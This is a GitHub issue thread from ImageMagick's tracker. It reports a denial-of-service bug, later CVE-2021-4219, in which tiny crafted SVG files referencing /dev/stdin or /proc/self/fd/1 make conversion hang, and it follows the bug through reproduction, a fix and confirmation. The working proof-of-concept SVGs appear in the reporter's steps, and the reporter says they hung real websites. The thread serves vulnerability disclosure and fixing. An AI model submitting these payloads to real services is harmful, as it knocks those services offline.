
Specially crafted SVG hangs ImageMagick forever, possible to leverage DoS #4626

Closed
stypr opened this issue Dec 22, 2021 · 11 comments

Comments


stypr commented Dec 22, 2021

Tested ImageMagick version

6.9.10-23, 7.1.0-18

Fixed Versions

6.9.12-34, 7.1.0-19

Operating system

Linux

Operating system, version and so on

Ubuntu 20.04.3 LTS / Ubuntu 21.04

Description

A specially crafted SVG file that opens /proc/self/fd/1 or /dev/stdin results in a hang with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted SVG file.

There seem to be a lot of websites affected by this bug; uploading this PoC file to the server causes a complete hang.

I think it would be better to check the file descriptor coming from /proc and /dev before read() is done.

Steps to Reproduce

  1. Craft an SVG file
  • ImageMagick 7
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
  <image href="/dev/stdin" />
  <svg width="1024px" height="1024px" />
</svg>
  • ImageMagick 6
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<go>
    <image href="/proc/self/fd/1" />
    <svg width="1024px" height="1024px" />
</go>
  2. Run some commands for verification
$ convert --version
Version: ImageMagick 6.9.10-23 Q16 x86_64 20190101 https://imagemagick.org
Copyright: © 1999-2019 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC Modules OpenMP 
Delegates (built-in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr ltdl lzma openexr pangocairo png tiff webp wmf x xml zlib
$ identify attack.png
attack.png SVG 1024x1024 1024x1024+0+0 16-bit sRGB 232B 0.000u 0:00.009
$ timeout 60 convert attack.png nope.png
$ timeout 60 mogrify attack.png nope1234.png
stypr changed the title from "Specially crafted SVG hangs ImageMagick forever, possible to leverage DoS on services" to "Specially crafted SVG hangs ImageMagick forever, possible to leverage DoS" on Dec 22, 2021

snibgo commented Dec 22, 2021

I can't reproduce the problem with IM v7.0.8-4. Which delegate are you using? For me, Inkscape refuses to open the SVG. MSVG and RSVG return quickly, with a white image.

Does limiting resources (such as time) cure the problem for you?


stypr commented Dec 22, 2021

@snibgo

I'm using the default delegate.xml shipped on the latest Ubuntu stable release on 20.04.3 x86_64.

delegate.xml

  <delegate decode="png" encode="webp" command="&quot;cwebp&quot; -quiet %Q &quot;%i&quot; -o &quot;%o&quot;"/>
  <delegate decode="svg" command="&quot;rsvg-convert&quot; -o &quot;%o&quot; &quot;%i&quot;"/>
  <delegate decode="svg:decode" stealth="True" command="&quot;inkscape&quot; &quot;%s&quot; --export-png=&quot;%s&quot; --export-dpi=&quot;%s&quot; --export-background=&quot;%s&quot; --export-background-opacity=&quot;%s&quot; &gt; &quot;%s&quot; 2&gt;&amp;1"/>

Convert hangs forever somewhere here.

$ convert -verbose attack.png nope.png
'inkscape' '/tmp/magick-16770ZqCidVWQSUgg' --export-png='/tmp/magick-16770B3ZH8ygrEB7h' --export-dpi='96,96' --export-background='rgb(100%,100%,100%)' --export-background-opacity='1' > '/tmp/magick-167709qAs39fwMk5h' 2>&1

Content of the temporary file generated:

$ cat /tmp/magick-*
push graphic-context
image Over 0,0 0,0 "/dev/stdin"
pop graphic-context
push graphic-context
compliance "SVG"
fill "black"
fill-opacity 1
stroke "none"
stroke-width 1
stroke-opacity 1
fill-rule nonzero
viewbox 0 0 1024 1024
affine 1 0 0 1 0 0
pop graphic-context

These commands run forever and never exit by themselves, so I think there needs to be some kind of alarm or timeout when opening the file, if checking the fd is difficult in this case.


fmw42 commented Dec 22, 2021

Try installing Inkscape. IM should use that and it is better.


stypr commented Dec 22, 2021

> Try installing Inkscape. IM should use that and it is better.

I already have inkscape installed on my PC.
My point is that there are web services that depend on ImageMagick, and I was able to crash some web services with this PoC.

$ inkscape --version
Inkscape 0.92.5 (2060ec1f9f, 2020-04-08)
$ convert -verbose attack.png nope.png
'inkscape' '/tmp/magick-19156v7R9pBksZPkI' --export-png='/tmp/magick-191561ezCofbOFbLG' --export-dpi='96,96' --export-background='rgb(100%,100%,100%)' --export-background-opacity='1' > '/tmp/magick-19156H_pjchWXNT5E' 2>&1

Note: It still causes an issue regardless of whether inkscape is installed or not.


stypr commented Dec 22, 2021

I built the latest version of ImageMagick (ImageMagick 7.1.0-18) from sources and found that it's still reproducible on the latest versions, although the payload needs to be changed a little bit.

root@ubuntu:/srv# convert --version
Version: ImageMagick 7.1.0-18 Q16-HDRI x86_64 2021-12-04 https://imagemagick.org
Copyright: (C) 1999-2021 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5) 
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jp2 jpeg lcms lqr lzma openexr png tiff x xml zlib
Compiler: gcc (10.2)

Modified attack.svg:

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
  <image href="/dev/stdin" />
  <svg width="1024px" height="1024px" />
</svg>

Test without inkscape (Hangs)

root@ubuntu:/srv# inkscape
Command 'inkscape' not found, but can be installed with:
snap install inkscape  # version 1.0.1-0767f8302a-2020-10-17, or
apt  install inkscape  # version 1.0.2-3ubuntu1
See 'snap info inkscape' for additional versions.
root@ubuntu:/srv# convert -verbose attack.svg nope.png
'inkscape' '/tmp/magick-krpwF0bShC5wshMqqNkJ7fAJrm2qMS2Q' --export-filename='/tmp/magick-KeNRuE1fQwuAoGhRROeemRPDO21E4zvE.png' --export-dpi='96' --export-background='rgb(100%,100%,100%)' --export-background-opacity='0.99999999999900002212' > '/tmp/magick-wY_0uzy4rmxGYzNBAEQ4-iPYJSJdV2vQ' 2>&1

Perhaps you don't need inkscape to convert an SVG file either.

root@ubuntu:/srv# inkscape
Command 'inkscape' not found, but can be installed with:
snap install inkscape  # version 1.0.1-0767f8302a-2020-10-17, or
apt  install inkscape  # version 1.0.2-3ubuntu1
See 'snap info inkscape' for additional versions.
root@ubuntu:/srv# cat 410.svg 
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
  <path d="M30,1h40l29,29v40l-29,29h-40l-29-29v-40z" stroke="#000" fill="none"/> 
  <path d="M31,3h38l28,28v38l-28,28h-38l-28-28v-38z" fill="#a23"/> 
  <text x="50" y="68" font-size="48" fill="#FFF" text-anchor="middle"><![CDATA[410]]></text>
</svg>
root@ubuntu:/srv# convert -verbose 410.svg 410.png
'inkscape' '/tmp/magick-vwlrvqqTW73Wn81Lk0h3YP4FvmnfNEYO' --export-filename='/tmp/magick-BUNAnOt4ElQ_9KVlUAadmD1-QSWzpLvC.png' --export-dpi='96' --export-background='rgb(100%,100%,100%)' --export-background-opacity='0.99999999999900002212' > '/tmp/magick-v4ZtG3Gl7B1uUju2rMpO_1AicDdzYDL8' 2>&1
mvg:/tmp/magick-BH-n-CxjbaDtuPtcuiaqSSkmlPuW7dW4=>/tmp/magick-BH-n-CxjbaDtuPtcuiaqSSkmlPuW7dW4 MVG 100x100 100x100+0+0 16-bit sRGB 506B 0.020u 0:00.015
410.svg SVG 100x100 100x100+0+0 16-bit sRGB 506B 0.000u 0:00.000
410.svg=>410.png SVG 100x100 100x100+0+0 16-bit sRGB 506B 0.000u 0:00.001

Test with inkscape (does not seem to hang this time)

root@ubuntu:/srv# apt install inkscape
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
  fig2dev gawk gcc-11-base imagemagick imagemagick-6.q16 libasan6 libatomic1 libblas3 libcc1-0 libcdr-0.1-1 libdouble-conversion3 libgc1
  libgcc-s1 libgdl-3-5 libgdl-3-common libgfortran5 libgomp1 libgsl25 libgslcblas0 libgtkspell3-3-0 libimage-magick-perl
  libimage-magick-q16-perl libitm1 liblapack3 liblsan0 libnetpbm10 libpotrace0 libquadmath0 librevenge-0.0-0 libstdc++6 libtsan0 libubsan1
  libvisio-0.1-1 libwmf-bin libwpd-0.10-10 libwpg-0.3-3 netpbm python3-bs4 python3-html5lib python3-lxml python3-numpy python3-scour
  python3-soupsieve python3-webencodings
...
root@ubuntu:/srv# convert -verbose attack.svg nope.png
'inkscape' '/tmp/magick-BLeTixHdFQU4qQ7Ag2zSMcjGAjVVGCVT' --export-filename='/tmp/magick-mgLmZddfgEtcWfsT7qlRDmWwdF2gYO4m.png' --export-dpi='96' --export-background='rgb(100%,100%,100%)' --export-background-opacity='0.99999999999900002212' > '/tmp/magick-1-fuN_o8-UGMM-q-TfP5jv4EyZOMYJqr' 2>&1
/tmp/magick-mgLmZddfgEtcWfsT7qlRDmWwdF2gYO4m.png PNG 100x100 100x100+0+0 8-bit sRGB 371B 0.000u 0:00.000
attack.svg SVG 100x100 100x100+0+0 8-bit sRGB 371B 0.000u 0:00.000
attack.svg=>nope.png SVG 100x100 100x100+0+0 8-bit sRGB 371B 0.000u 0:00.001

Tested on Ubuntu 21.04

root@ubuntu:/srv# lsb_release -a
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu Hirsute Hippo (development branch)
Release:	21.04
Codename:	hirsute

ImageMagick configure

==============================================================================
ImageMagick 7.1.0-18 is configured as follows. Please verify that this
configuration matches your expectations.

Host system type: x86_64-pc-linux-gnu
Build system type: x86_64-pc-linux-gnu

                  Option                        Value
------------------------------------------------------------------------------
Shared libraries  --enable-shared=yes		yes
Static libraries  --enable-static=yes		yes
Build utilities   --with-utilities=yes		yes
Module support    --with-modules=no		no
GNU ld            --with-gnu-ld=yes		yes
Quantum depth     --with-quantum-depth=16	16
High Dynamic Range Imagery
                  --enable-hdri=yes		yes

Install documentation:				yes

Memory allocation library:
  JEMalloc          --with-jemalloc=no		no
  TCMalloc          --with-tcmalloc=no		no
  UMem              --with-umem=no		no

Delegate library configuration:
  BZLIB             --with-bzlib=yes		yes
  Autotrace         --with-autotrace=no		no
  DJVU              --with-djvu=yes		yes
  DPS               --with-dps=yes		no
  FFTW              --with-fftw=no		no
  FLIF              --with-flif=yes		no
  FlashPIX          --with-fpx=yes		no
  FontConfig        --with-fontconfig=yes	yes
  FreeType          --with-freetype=yes		yes
  Ghostscript lib   --with-gslib=no		no
  Graphviz          --with-gvc=yes		no
  HEIC              --with-heic=yes		no
  JBIG              --with-jbig=yes		yes
  JPEG v1           --with-jpeg=yes		yes
  JPEG XL           --with-jxl=no		no
  LCMS              --with-lcms=yes		yes
  LQR               --with-lqr=yes		yes
  LTDL              --with-ltdl=no		no
  LZMA              --with-lzma=yes		yes
  Magick++          --with-magick-plus-plus=yes	yes
  OpenEXR           --with-openexr=yes		yes
  OpenJP2           --with-openjp2=yes		yes
  PANGO             --with-pango=yes		no
  PERL              --with-perl=no		no
  PNG               --with-png=yes		yes
  RAQM              --with-raqm=yes		no
  RAW               --with-raw=yes		no
  RSVG              --with-rsvg=no		no
  TIFF              --with-tiff=yes		yes
  WEBP              --with-webp=yes		no
  WMF               --with-wmf=no		no
  X11               --with-x=			yes
  XML               --with-xml=yes		yes
  ZIP               --with-zip=yes		no
  ZLIB              --with-zlib=yes		yes
  ZSTD              --with-zstd=yes		no

Delegate program configuration:
  GhostPCL          None			pcl6 (unknown)
  GhostXPS          None			gxps (unknown)
  Ghostscript       None			gs (9.53.3)

Font configuration:
  Apple fonts       --with-apple-font-dir=default	
  Dejavu fonts      --with-dejavu-font-dir=default	none
  Ghostscript fonts --with-gs-font-dir=default		/usr/share/fonts/type1/gsfonts/
  URW-base35 fonts  --with-urw-base35-font-dir=default	none
  Windows fonts     --with-windows-font-dir=default	none

X11 configuration:
  X_CFLAGS        = 
  X_PRE_LIBS      =  -lSM -lICE
  X_LIBS          = 
  X_EXTRA_LIBS    = 

Options used to compile and link:
  PREFIX          = /usr/local
  EXEC-PREFIX     = /usr/local
  VERSION         = 7.1.0-18
  CC              = gcc
  CFLAGS          = -I/usr/include/libxml2 -I/usr/include/libpng16 -pthread -I/usr/include/OpenEXR  -I/usr/include/lqr-1 -I/usr/include/glib-2.0 -I/usr/lib/x86_64-linux-gnu/glib-2.0/include -I/usr/include/openjpeg-2.3  -I/usr/include/freetype2 -I/usr/include/libpng16 -I/usr/include/uuid -I/usr/include/freetype2 -I/usr/include/libpng16 -pthread  -fopenmp -Wall -g -O2 -mtune=amdfam10 -fexceptions -pthread -DMAGICKCORE_HDRI_ENABLE=1 -DMAGICKCORE_QUANTUM_DEPTH=16
  CPPFLAGS        =  -DMAGICKCORE_HDRI_ENABLE=1 -DMAGICKCORE_QUANTUM_DEPTH=16 
  PCFLAGS         = 
  DEFS            = -DHAVE_CONFIG_H
  LDFLAGS         =  
  LIBS            =  -ljbig -llcms2 -ltiff -lfreetype  -ljpeg   -llqr-1 -lglib-2.0 -lpng16 -lz  -ldjvulibre    -lfontconfig -lfreetype      -lXext -lXt   -lSM -lICE -lX11  -llzma -lbz2 -lIlmImf-2_5 -lImath-2_5 -lHalf-2_5 -lIex-2_5 -lIexMath-2_5 -lIlmThread-2_5 -pthread -lopenjp2    -lxml2  -lz     -lm    -lpthread 
  CXX             = g++
  CXXFLAGS        =  -pthread
  FEATURES        = DPC HDRI Cipher OpenMP
  DELEGATES       = bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr openjp2 png ps tiff x xml zlib
==============================================================================


stypr commented Dec 22, 2021

As mentioned earlier, the default package without Inkscape being explicitly installed still lets ImageMagick hang forever, and I found some websites hanging forever after uploading the crafted SVG file.
I hope there is some way to add a timeout or reject these file descriptors.


snibgo commented Dec 22, 2021

As I asked above: Does limiting resources (such as time) cure the problem for you?

@urban-warrior
Member

Thanks for the problem report. We can reproduce it and will have a patch to fix it in the GIT main branch @ https://github.com/ImageMagick/ImageMagick later today. The patch will be available in the beta releases of ImageMagick @ https://imagemagick.org/download/beta/ by sometime tomorrow.

urban-warrior pushed a commit to ImageMagick/ImageMagick6 that referenced this issue Dec 22, 2021

stypr commented Dec 23, 2021

@snibgo

> As I asked above: Does limiting resources (such as time) cure the problem for you?

Yes.

It should help, but only to a certain extent. There are some rare cases where open() may slow down depending on the type of filesystem and the condition of the disks you're using.

The best way would be to detect S_IFCHR from stat()'s st_mode.
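Added example, not ImageMagick's own code: the st_mode check proposed above, done with fstat() on the opened descriptor so a reader that only accepts regular files never blocks on a device or pipe. The function name regular_file_check and the /tmp/imcheck_* temp-file templates are my own choices.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns 1 if path is a regular file (reads reach EOF), 0 if it is a
 * character device, FIFO, socket or directory (refused), -1 on open error.
 * O_NONBLOCK stops open() itself from blocking on a FIFO with no writer;
 * fstat() on the descriptor, not stat() on the path, leaves no symlink race. */
int regular_file_check(const char *path)
{
    struct stat st;
    int fd = open(path, O_RDONLY | O_NONBLOCK | O_CLOEXEC);
    if (fd < 0) return -1;
    int ok = (fstat(fd, &st) == 0 && S_ISREG(st.st_mode)) ? 1 : 0;
    close(fd);
    return ok;
}

/* Constructed input: an empty temporary regular file (expected result: 1). */
int demo_regular(void)
{
    char name[] = "/tmp/imcheck_regXXXXXX";
    int fd = mkstemp(name);
    if (fd < 0) return -1;
    close(fd);
    int r = regular_file_check(name);
    unlink(name);
    return r;
}

/* Constructed input: a FIFO with no writer, the shape /dev/stdin takes when
 * stdin is a pipe; a blocking read() here never returns (expected result: 0). */
int demo_fifo(void)
{
    char dir[] = "/tmp/imcheck_fifoXXXXXX";
    char path[64];
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(path, sizeof path, "%s/pipe", dir);
    int r = (mkfifo(path, 0600) == 0) ? regular_file_check(path) : -1;
    unlink(path);
    rmdir(dir);
    return r;
}

int main(void)
{
    printf("/dev/null=%d regular=%d fifo=%d\n",
           regular_file_check("/dev/null"), demo_regular(), demo_fifo());
    return 0;
}
```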


stypr commented Dec 25, 2021

Tested ImageMagick 7.1.0-20 on Ubuntu 21.04.
Seems like it works fine now.

$ convert -version
Version: ImageMagick 7.1.0-20 Q16-HDRI x86_64 2021-12-22 https://imagemagick.org
Copyright: (C) 1999-2021 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5) 
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jp2 jpeg lcms lqr lzma openexr png tiff x xml zlib
Compiler: gcc (10.3)

$ convert -verbose attack.svg attack.png
'inkscape' '/tmp/magick-twCAk57ZWHyxKT5NSfJ4omkgtAHSiYvR' --export-filename='/tmp/magick-nuV9Vh_kdAhYKjqDQIHlWtzxL6szOlVH.png' --export-dpi='96' --export-background='rgb(100%,100%,100%)' --export-background-opacity='0.99999999999900002212' > '/tmp/magick-irpVl0ub-PruzN6c-AS1jrblDa4mryCq' 2>&1
mvg:/tmp/magick-Clqs67jnm-4NnaGBz4D4eRcgBemmcqCH=>/tmp/magick-Clqs67jnm-4NnaGBz4D4eRcgBemmcqCH MVG 100x100 100x100+0+0 16-bit sRGB 470B 0.000u 0:00.004
attack.svg SVG 100x100 100x100+0+0 16-bit sRGB 470B 0.000u 0:00.000
attack.svg=>attack.png SVG 100x100 100x100+0+0 16-bit sRGB 470B 0.000u 0:00.001
convert: no decode delegate for this image format `' @ error/constitute.c/ReadImage/572.
convert: non-conforming drawing primitive definition `image' @ error/draw.c/RenderMVGContent/4465.

bmwiedemann pushed a commit to bmwiedemann/openSUSE that referenced this issue Jan 5, 2022
https://build.opensuse.org/request/show/943529
by user pgajdos + dimstar_suse
- update to 7.1.0.19:
  * support -integral option.
  * possible DoS for certain SVG constructs (reference
    ImageMagick/ImageMagick#4626).

- update to 7.1.0.18:
  * support face index for font collections, e.g. msgothic.ttc[1].
  * Improved adjustment of page offset when resizing an image. (forwarded request 943180 from dirkmueller)
netbsd-srcmastr pushed a commit to NetBSD/pkgsrc that referenced this issue Jan 5, 2022
2021-12-22  7.1.0-19  <quetzlzacatenango@image...>
  * Release ImageMagick version 7.1.0-19 GIT revision 19456:d7f1b2b9b:20211222

2021-12-22  7.1.0-19  <quetzlzacatenango@image...>
  * support -integral option.
  * possible DoS for certain SVG constructs (reference
    ImageMagick/ImageMagick#4626).

2021-12-18  7.1.0-18  <quetzlzacatenango@image...>
  * Release ImageMagick version 7.1.0-18 GIT revision 19447:6c7d62f7d:20211218

2021-12-11  7.1.0-18  <quetzlzacatenango@image...>
  * support face index for font collections, e.g. msgothic.ttc[1].

2021-12-11  7.1.0-18  Dirk Lemstra <dirk@lem.....org>
  * Improved adjustment of page offset when resizing an image.

stypr commented Feb 15, 2022

CVE-2021-4219 was assigned to this issue.
